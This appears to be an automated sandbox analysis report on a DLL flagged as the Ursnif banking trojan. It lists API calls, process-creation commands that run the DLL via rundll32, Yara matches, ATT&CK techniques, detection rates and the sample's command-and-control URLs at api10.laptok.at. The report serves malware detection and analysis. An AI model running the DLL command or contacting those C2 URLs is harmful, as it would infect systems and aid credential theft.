Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: C:\Windows\System32\loaddll32.exe

Section loaded: mspdb140.dll

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100021A4	0_2_100021A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FA40B3	0_2_00FA40B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAAF44	0_2_00FAAF44

Source: 2e.dll

Static PE information: invalid certificate

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001C22 GetProcAddress,NtCreateSection,memset,	0_2_10001C22
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001AD1 NtMapViewOfSection,	0_2_10001AD1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001252 GetLastError,NtClose,	0_2_10001252
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100023C5 NtQueryVirtualMemory,	0_2_100023C5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FA7925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_00FA7925
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAB169 NtQueryVirtualMemory,	0_2_00FAB169

Source: 2e.dll	Virustotal: Detection: 65%
Source: 2e.dll	Metadefender: Detection: 40%
Source: 2e.dll	ReversingLabs: Detection: 82%

Source: 2e.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FA229C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00FA229C

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2e.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C2243AE9-2779-11EC-90EB-ECF4BBEA1588}.dat

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF302033FC2C26A542.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.winDLL@11/19@2/1

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002193 push ecx; ret	0_2_100021A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002140 push ecx; ret	0_2_10002149
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAE6BE push esp; retf	0_2_00FAE6BF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAAC00 push ecx; ret	0_2_00FAAC09
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAE1AF push ebx; ret	0_2_00FAE1B2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAE163 push edx; iretd	0_2_00FAE164
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FAAF33 push ecx; ret	0_2_00FAAF43
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D5BAD0 push edx; ret	0_2_00D5BBD4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D53C54 push eax; iretd	0_2_00D53C4B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D53C32 push eax; iretd	0_2_00D53C4B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D5197F push ds; retf	0_2_00D5198D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D516B6 push ecx; ret	0_2_00D516B7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D552B6 push esp; iretd	0_2_00D552D5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D55EB0 push 0E0634C7h; retf	0_2_00D55EB5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D53205 push cs; retf	0_2_00D53206
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D53FFB pushad ; iretd	0_2_00D5400E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00D533A6 push ds; ret	0_2_00D533BB

Source: 2e.dll

Static PE information: section name: .data2

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_00FA7DD8

Source: C:\Windows\System32\loaddll32.exe

Memory protected: page execute read | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

0_2_10001B13

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FA8B98 cpuid

0_2_00FA8B98

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_1000166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_1000166F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_10001000

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00FA8B98 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_00FA8B98

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Account Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Owner/User Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Information Discovery33	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2e.dll	66%	Virustotal		Browse
2e.dll	41%	Metadefender		Browse
2e.dll	83%	ReversingLabs	Win32.Trojan.Ursnif
2e.dll	100%	Avira	TR/AD.Ursnif.rluee

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.rundll32.exe.30e0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
0.2.loaddll32.exe.e00000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
2.2.rundll32.exe.10000000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
0.2.loaddll32.exe.10000000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File

Domains

Source	Detection	Scanner	Label	Link
api10.laptok.at	14%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5a	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tX	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1P	0%	Avira URL Cloud	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://api10.laptok.at/favicon.ico	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B	0%	Avira URL Cloud	safe

Domains and IPs

